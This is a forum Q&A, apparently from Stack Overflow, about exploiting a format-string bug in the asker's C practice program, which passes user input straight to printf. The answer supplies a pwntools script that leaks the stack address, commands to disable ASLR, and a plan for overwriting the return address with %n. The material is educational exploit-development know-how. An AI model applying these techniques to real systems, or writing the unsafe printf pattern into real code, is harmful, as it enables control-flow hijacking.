C Format-String vulnerability, how to get address in buffer

I have a program that loops and reads from stdin with fgets. The whole read loop is located in a function and I am trying to overwrite the return address of the function with the printf vulnerability. The return address is located at 0xbffff0fc (it is 0x2a20029e) and the buffer on the stack is identified by the input AAAA (0x41414141).

0xbffff0b0: 0x0000000a  0x00000020  0xb7fc7c20  0xb7e4fd94
0xbffff0c0: 0xb7fc73cc  0xbffff0dc  0x41414141  0x66740000
0xbffff0d0: 0x785c2220  0x785c3439  0x785c3739  0x785c3430
0xbffff0e0: 0x29223830  0xb7fc0000  0x5da95700  0x00000000
0xbffff0f0: 0x00000000  0xb7fc7000  0x00000000  0x2a20029e

So from my understanding I need to write 0xbffff0fc in the buffer and then I can use %x%6$n (k is an integer) to write an arbitrary value to 0xbffff0fc.

So the input would look something like this: <0xbffff0fc>%x%6$n. The problem I have is how do I write <0xbffff0fc> so that it is 0xbffff0fc on the stack. With the ASCII characters alone I cannot really do this.

Edit: added the program

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int function1()
{
  char line[32];
  size_t size;
  while(1)
  {
    if (!fgets(line, sizeof(line), stdin))
    {
      return 0;
    }

    size = strlen(line);
    line[size - 1] = '\0';
    printf(line);
    printf("\n");
  }
  return 0;
}

int main(int argc, char** argv)
{
    function1();
    return 0;
}

Happy to see people ask about security question here. I think you could take a look of pwntools.

This is a tool for writing exploit. Here is a simple code snippet.

#!/usr/bin/env python2
from pwn import *
# a.out is your executable file
s = process('./a.out')
payload = p32(0xbffff0fc)+"%7$p"
# p32() is a function to pack your integer in little endian order
s.sendline(payload)
s.interactive()

The output will be some unprintable characters plus 0xbffff0fc

▒▒0xbffff0fc

For further explanation, line variable is already on stack. But you have to disable the ASLR protection to make your stack address fixed. Otherwise, every time you execute your program. Your line variable address will be different.

Disable it:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Enable it:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

But, I don't think your problem will be how to write 0xbffff0fc to stack. Your problem should be how to get the variable address of line with ASLR enabled.

Here is the strategy.

1. Leak the ebp of stack frame then you could calculate the address of line variable.(This part is important)

2. Do the same thing of the previous sample exploit.

3. Then, use %n to rewrite return address of function.

If you have question, feel free to ask me.